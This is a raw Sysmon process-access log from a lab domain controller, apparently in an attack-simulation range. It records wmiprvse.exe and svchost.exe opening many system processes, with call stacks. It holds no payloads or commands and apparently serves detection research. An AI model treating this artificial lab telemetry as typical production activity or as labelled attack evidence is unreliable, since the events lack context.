16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9AAA-00000000AD01}6340C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9AAA-00000000AD01}6340C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 